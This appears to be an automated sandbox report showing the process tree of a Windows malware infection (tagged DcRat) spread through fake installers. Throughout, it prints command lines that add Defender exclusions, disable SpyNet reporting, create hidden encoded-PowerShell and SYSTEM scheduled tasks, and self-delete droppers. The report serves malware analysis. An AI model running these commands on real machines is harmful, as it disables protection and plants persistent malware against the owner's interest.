C:\Users\Admin\Pictures\DYpEz0d1hVzSFepQKeLM8aFr.exeC:\Users\Admin\Pictures\DYpEz0d1hVzSFepQKeLM8aFr.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x6d398538,0x6d398548,0x6d3985547⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310202202291\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310202202291\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310202202291\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310202202291\assistant\assistant_installer.exe" --version6⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310202202291\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310202202291\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.25 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0xc11588,0xc11598,0xc115a47⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\4PFvj2BuE5SssdiIHU5IHqoQ.exe"C:\Users\Admin\Pictures\4PFvj2BuE5SssdiIHU5IHqoQ.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\Pictures\TovaMdmdKqJujG2NIOLvlgij.exe"C:\Users\Admin\Pictures\TovaMdmdKqJujG2NIOLvlgij.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\TovaMdmdKqJujG2NIOLvlgij.exe" & exit6⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\u0Tm1eLQaTkRNCZUZyRmz4j6.exe"C:\Users\Admin\Pictures\u0Tm1eLQaTkRNCZUZyRmz4j6.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Users\Admin\Pictures\1qmguHBWfYsw9OyjJNELoiUq.exe"C:\Users\Admin\Pictures\1qmguHBWfYsw9OyjJNELoiUq.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8FB8.tmp\Install.exe.\Install.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS91FA.tmp\Install.exe.\Install.exe /dcCcdidRiisJ "385118" /S7⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&9⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3210⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6410⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&9⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3210⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6410⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbgVEsUld" /SC once /ST 01:52:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="8⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gbgVEsUld"8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gbgVEsUld"8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 22:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\AzZVlsx.exe\" 3Y /GOsite_idCVq 385118 /S" /V1 /F8⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "bwpFiyeZPJPVdaMxTt"8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 12:13:03 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\RLuQQTfvaNwaabW\zwiFvun.exe\" KS /wXsite_idFYT 385118 /S" /V1 /F8⤵
- DcRat
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GyWbuVQzPmDmgkCMH"8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"8⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:328⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:329⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:648⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:649⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\tEYJLW.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F8⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\0SYB65jYPzXmMzWuU7RkyKsr.exe"C:\Users\Admin\Pictures\0SYB65jYPzXmMzWuU7RkyKsr.exe"5⤵
- Adds Run key to start application
-
C:\Windows\SYSTEM32\cmd.execmd /c hime.bat6⤵
-
C:\Users\Admin\Pictures\NZ846Y6mEuMEIf1BKZNGQ8A9.exe"C:\Users\Admin\Pictures\NZ846Y6mEuMEIf1BKZNGQ8A9.exe"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
-
C:\Users\Admin\Pictures\HZ1KnFhiwkTz6IdOEkB8hk3n.exe"C:\Users\Admin\Pictures\HZ1KnFhiwkTz6IdOEkB8hk3n.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\HZ1KnFhiwkTz6IdOEkB8hk3n.exe"C:\Users\Admin\Pictures\HZ1KnFhiwkTz6IdOEkB8hk3n.exe"6⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\Pictures\nQG3VibTBgjxr9bhLCYO2JWa.exe"C:\Users\Admin\Pictures\nQG3VibTBgjxr9bhLCYO2JWa.exe"5⤵
-
C:\Users\Admin\Pictures\7wpYWabgfODOBOcOyquAznvI.exe"C:\Users\Admin\Pictures\7wpYWabgfODOBOcOyquAznvI.exe"5⤵
-
C:\Users\Admin\Pictures\sCKMYLPnsKUBcdAprhJVig54.exe"C:\Users\Admin\Pictures\sCKMYLPnsKUBcdAprhJVig54.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Drops file in Program Files directory
-
C:\Users\Admin\Pictures\XG3z1Bn8L9ribYI5hU4MqaO6.exe"C:\Users\Admin\Pictures\XG3z1Bn8L9ribYI5hU4MqaO6.exe"5⤵
-
C:\Users\Admin\Pictures\9cobKJGF8MrN7kHyk6jBM53I.exe"C:\Users\Admin\Pictures\9cobKJGF8MrN7kHyk6jBM53I.exe"5⤵
-
C:\Users\Admin\Pictures\5l1VRSRCN7YK7a3CtT3IQKXl.exe"C:\Users\Admin\Pictures\5l1VRSRCN7YK7a3CtT3IQKXl.exe" --silent --allusers=05⤵
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\5l1VRSRCN7YK7a3CtT3IQKXl.exeC:\Users\Admin\Pictures\5l1VRSRCN7YK7a3CtT3IQKXl.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x67488538,0x67488548,0x674885546⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\5l1VRSRCN7YK7a3CtT3IQKXl.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\5l1VRSRCN7YK7a3CtT3IQKXl.exe" --version6⤵
-
C:\Users\Admin\Pictures\hm3VgvbX0RpwJft3Ks5MsuNv.exe"C:\Users\Admin\Pictures\hm3VgvbX0RpwJft3Ks5MsuNv.exe"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
-
C:\Users\Admin\Pictures\fdXwib8x2AEDNvl2ahsA2Xum.exe"C:\Users\Admin\Pictures\fdXwib8x2AEDNvl2ahsA2Xum.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS71D2.tmp\Install.exe.\Install.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS77BE.tmp\Install.exe.\Install.exe /dcCcdidRiisJ "385118" /S7⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&9⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3210⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6410⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&9⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3210⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6410⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ghQnEjJOb" /SC once /ST 11:09:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="8⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ghQnEjJOb"8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ghQnEjJOb"8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 22:22:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\jvtAfMr.exe\" 3Y /Cjsite_idLYH 385118 /S" /V1 /F8⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
C:\Users\Admin\Pictures\qex1xvO7iPN5Tgr3HdHqoDTm.exe"C:\Users\Admin\Pictures\qex1xvO7iPN5Tgr3HdHqoDTm.exe"5⤵
-
C:\Users\Admin\Pictures\nntLHTRLvDU9PwHaQD6GWjN7.exe"C:\Users\Admin\Pictures\nntLHTRLvDU9PwHaQD6GWjN7.exe"5⤵
-
C:\Users\Admin\Pictures\368tcBILAowyQCsFUuXuXZKX.exe"C:\Users\Admin\Pictures\368tcBILAowyQCsFUuXuXZKX.exe"5⤵
- Adds Run key to start application
-
C:\Users\Admin\Pictures\gMUEbxyueAh9IXTvDddkxMom.exe"C:\Users\Admin\Pictures\gMUEbxyueAh9IXTvDddkxMom.exe"5⤵
-
C:\Users\Admin\Pictures\zmPqkppTir9ymNAYEYxd4Mp9.exe"C:\Users\Admin\Pictures\zmPqkppTir9ymNAYEYxd4Mp9.exe"5⤵
-
C:\Users\Admin\Pictures\zmPqkppTir9ymNAYEYxd4Mp9.exe"C:\Users\Admin\Pictures\zmPqkppTir9ymNAYEYxd4Mp9.exe"6⤵
-
C:\Users\Admin\Pictures\1QdvoR5XP1sv4MKWEJJjEedj.exe"C:\Users\Admin\Pictures\1QdvoR5XP1sv4MKWEJJjEedj.exe"5⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\1QdvoR5XP1sv4MKWEJJjEedj.exe" & exit6⤵
-
C:\Users\Admin\Pictures\H6cZCiuohNblZ6xzH9FsM25y.exe"C:\Users\Admin\Pictures\H6cZCiuohNblZ6xzH9FsM25y.exe"5⤵
-
C:\Users\Admin\Pictures\JNp4SvpUduBDjBlcmZCTejPL.exe"C:\Users\Admin\Pictures\JNp4SvpUduBDjBlcmZCTejPL.exe" --silent --allusers=05⤵
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\JNp4SvpUduBDjBlcmZCTejPL.exeC:\Users\Admin\Pictures\JNp4SvpUduBDjBlcmZCTejPL.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x665e8538,0x665e8548,0x665e85546⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\JNp4SvpUduBDjBlcmZCTejPL.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\JNp4SvpUduBDjBlcmZCTejPL.exe" --version6⤵
-
C:\Users\Admin\Pictures\U8rLMGAj7dC6Qyb6WTAnjKjg.exe"C:\Users\Admin\Pictures\U8rLMGAj7dC6Qyb6WTAnjKjg.exe"5⤵
- Checks computer location settings
- Drops file in System32 directory
-
C:\Users\Admin\Pictures\KdORrQ100mqZeD3dRwdfrFSM.exe"C:\Users\Admin\Pictures\KdORrQ100mqZeD3dRwdfrFSM.exe"5⤵
-
C:\Users\Admin\Pictures\yCspsJbvQr9tif840XgpnU7a.exe"C:\Users\Admin\Pictures\yCspsJbvQr9tif840XgpnU7a.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS9ED1.tmp\Install.exe.\Install.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSA47E.tmp\Install.exe.\Install.exe /dcCcdidRiisJ "385118" /S7⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"8⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gkGadCSnv" /SC once /ST 19:43:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="8⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gkGadCSnv"8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gkGadCSnv"8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 22:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\qXJStOM.exe\" 3Y /Yrsite_idWFV 385118 /S" /V1 /F8⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\btPHHvF6vk1moCoVB3agy30R.exe"C:\Users\Admin\Pictures\btPHHvF6vk1moCoVB3agy30R.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC31B.tmp\Install.exe.\Install.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS76FA.tmp\Install.exe.\Install.exe /dcCcdidRiisJ "385118" /S7⤵
- Checks BIOS information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"8⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gMKEuumKQ" /SC once /ST 17:46:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="8⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\nO1mmVtvXRiJxeIVy9gZoW0m.exe"C:\Users\Admin\Pictures\nO1mmVtvXRiJxeIVy9gZoW0m.exe"5⤵
-
C:\Users\Admin\Pictures\vaRMtoPJeTEpZnx6CrhAV0Vi.exe"C:\Users\Admin\Pictures\vaRMtoPJeTEpZnx6CrhAV0Vi.exe" --silent --allusers=05⤵
-
C:\Users\Admin\Pictures\x2YOyujnLMGkZRz1yGHYUVlJ.exe"C:\Users\Admin\Pictures\x2YOyujnLMGkZRz1yGHYUVlJ.exe"5⤵
-
C:\Users\Admin\Pictures\3BVgtwc7j6GJGDO6rH2wNRCh.exe"C:\Users\Admin\Pictures\3BVgtwc7j6GJGDO6rH2wNRCh.exe"5⤵
-
C:\Users\Admin\Pictures\87M22ngbhAvgP6OJDvvQcQBX.exe"C:\Users\Admin\Pictures\87M22ngbhAvgP6OJDvvQcQBX.exe"5⤵
-
C:\Users\Admin\Pictures\aZ35CGa9k3oAMw4SKpJkZfH0.exe"C:\Users\Admin\Pictures\aZ35CGa9k3oAMw4SKpJkZfH0.exe"5⤵
-
C:\Users\Admin\Pictures\36T28cYBfWpOBMK2ML6NRof6.exe"C:\Users\Admin\Pictures\36T28cYBfWpOBMK2ML6NRof6.exe"5⤵
-
C:\Users\Admin\Pictures\h8CaAXWBzkTHNfX907nh3XgW.exe"C:\Users\Admin\Pictures\h8CaAXWBzkTHNfX907nh3XgW.exe"5⤵
-
C:\Users\Admin\Pictures\94A21TGUSsaK3idgAdKf3OfA.exe"C:\Users\Admin\Pictures\94A21TGUSsaK3idgAdKf3OfA.exe"5⤵
-
C:\Users\Admin\Pictures\mO1DzGU8jyjcZBGPqU0fMcGW.exe"C:\Users\Admin\Pictures\mO1DzGU8jyjcZBGPqU0fMcGW.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\a\system32.exe"C:\Users\Admin\AppData\Local\Temp\a\system32.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\system32.exe" & exit4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\a\angel.exe"C:\Users\Admin\AppData\Local\Temp\a\angel.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a\Ads.exe"C:\Users\Admin\AppData\Local\Temp\a\Ads.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\ySu7sAMyCqS01KlDN2vy8U5v.exe"C:\Users\Admin\Pictures\ySu7sAMyCqS01KlDN2vy8U5v.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
-
C:\Users\Admin\Pictures\ogZZKWwDzDgxlAuBrNdhPmHb.exe"C:\Users\Admin\Pictures\ogZZKWwDzDgxlAuBrNdhPmHb.exe" --silent --allusers=05⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\ogZZKWwDzDgxlAuBrNdhPmHb.exeC:\Users\Admin\Pictures\ogZZKWwDzDgxlAuBrNdhPmHb.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x294,0x2c0,0x6c5b8538,0x6c5b8548,0x6c5b85546⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\ogZZKWwDzDgxlAuBrNdhPmHb.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\ogZZKWwDzDgxlAuBrNdhPmHb.exe" --version6⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\3f6Zu1k83QFaHr91YTRRr8D3.exe"C:\Users\Admin\Pictures\3f6Zu1k83QFaHr91YTRRr8D3.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSAFF2.tmp\Install.exe.\Install.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSB2D0.tmp\Install.exe.\Install.exe /dcCcdidRiisJ "385118" /S7⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Drops file in Program Files directory
- Enumerates system info in registry
-
